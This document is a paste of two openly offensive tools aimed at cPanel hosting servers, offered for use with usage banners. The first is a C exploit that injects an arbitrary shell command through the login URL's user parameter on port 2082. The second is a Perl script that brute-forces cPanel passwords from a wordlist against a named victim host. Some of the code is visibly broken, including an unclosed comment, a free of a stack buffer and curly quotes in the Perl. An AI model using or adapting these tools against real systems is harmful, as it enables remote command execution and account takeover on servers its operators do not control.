cPanel (HTTP) xploit

1. /*
2. cPanel <= 9x Remote Command Execution
3. //headers
4. #include //In/Out
5. #include //sockets functions
6. #include //memory functions
7. #include //strlen,strcat,strcpy
8.  
9. #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
10.  
11. #define Port 2082 //port for connect to cPanel
12. #define SIZE 1024 //buffer size to receive the data
13.  
14. /*connect host:port*/
15. SOCKET Conecta(char *Host, short puerto)
16. {
17. /*struct for make the socket*/
18. WSADATA wsaData;
19. SOCKET Winsock;//listener socket
20. /*two structures for connect*/
21. struct sockaddr_in Winsock_In;
22. struct hostent *Ip;
23.  
24. /*start the socket*/
25. WSAStartup(MAKEWORD(2,2), &wsaData);
26. /*make*/
27. Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
28.  
29. //check socket status
30. if(Winsock==INVALID_SOCKET)
31. {
32. /*exit*/
33. WSACleanup();
34. return -1;
35. }
36.  
37. /*complete the struct*/
38. Ip=gethostbyname(Host);
39. Winsock_In.sin_port=htons(puerto);
40. Winsock_In.sin_family=AF_INET;
41. Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
42.  
43. /*connect*/
44. if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
45. {
46. /*end*/
47. WSACleanup();
48. return -1;
49. }
50.  
51. return Winsock;
52. }
53.  
54. /*MASTER FUNCTION*/
55. int main(int argc, char *argv[])
56. {
57. /*the socket*/
58. SOCKET sock;
59. /*make the evil buffer to send the request*/
60. char evil_request[]="GET /login/?user=|%22%60";
61. char evil_request2[]="%60%22\r";
62. char *evil;
63. /*to receive the data*/
64. char buf[SIZE];
65.  
66. printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
67. printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
68. printf("\n-----------------------------------------------------\n");
69.  
70. if(argc!=3)//cPanel_9x_rce.exe
71. {
72. printf("\n[+] Usage: %s \n",argv[0]);
73. return 0;
74. }
75.  
76. printf("\n[+] Connecting %s:%d...",argv[1],Port);
77.  
78. /*start the exploit*/
79. sock=Conecta(argv[1],Port);//connect
80. if(sock==-1)
81. {
82. printf("Error\n");
83. return 1;
84. }
85.  
86. printf("OK");
87.  
88. /*make the EVIL request*/
89. evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
90. strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
91.  
92. //sends it
93. send(sock,evil,strlen(evil),0);
94.  
95. buf[recv(sock,buf,SIZE,0)]='\0';
96.  
97. //show the data
98. printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
99.  
100. WSACleanup();
101. LocalFree(buf);
102. LocalFree(evil);
103. return 0;
104. }
105.  
106. #!/usr/bin/perl
107. # Cpanel Password Brute Forcer
108. # —————————-
109. # (c)jos_ali_joe
110. # Perl Version ( low speed )
111. # Oerginal Advisory :
112. use IO :: Socket ;
113. use LWP :: Simple ;
114. use MIME :: Base64 ;
115.  
116. $host = $ARGV [ 0 ];
117. $user = $ARGV [ 1 ];
118. $port = $ARGV [ 2 ];
119. $list = $ARGV [ 3 ];
120. $file = $ARGV [ 4 ];
121. $url = “http://” . $host . “:” . $port ;
122. if(@ ARGV < 3 ){
123. print q (
124. ###############################################################
125. # Cpanel Password Brute Force Tool #
126. ###############################################################
127. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
128. #————————————————————-#
129. # [Host] : victim Host (simorgh-ev.com) #
130. # [User] : User Name (demo) #
131. # [PORT] : Port of Cpanel (2082) #
132. #[list] : File Of password list (list.txt) #
133. # [File] : file for save password (password.txt) #
134. # #
135. ###############################################################
136. # (c)jos_ali_joe / Indonesian Coder #
137. ###############################################################
138. );exit;}
139.  
140. headx ();
141.  
142. $numstart = “-1″ ;
143.  
144. sub headx () {
145. print q (
146. ###############################################################
147. # Cpanel Password Brute Force Tool #
148. # (c)jos_ali_joe / Indonesian Coder #
149. ###############################################################
150. );
151. open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
152. @ PASSWORDS = < PASSFILE >;
153. close PASSFILE ;
154. foreach my $P (@ PASSWORDS ) {
155. chomp $P ;
156. $passwd = $P ;
157. print ”
158. [~] Try Password : $passwd
159. ” ;
160. & brut ;
161. };
162. }
163. sub brut () {
164. $authx = encode_base64 ( $user . “:” . $passwd );
165. print $authx ;
166. my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
167. [-] Can not connect to the host” ;
168. print $sock “GET / HTTP/1.1
169. ” ;
170. print $sock “Authorization: Basic $authx
171. ” ;
172. print $sock “Connection: Close
173.  
174. ” ;
175. read $sock , $answer , 128 ;
176. close ( $sock );
177.  
178. if ( $answer =~ / Moved /) {
179. print ”
180. [~] PASSWORD FOUND : $passwd
181. ” ;
182. exit();
183. }
184. }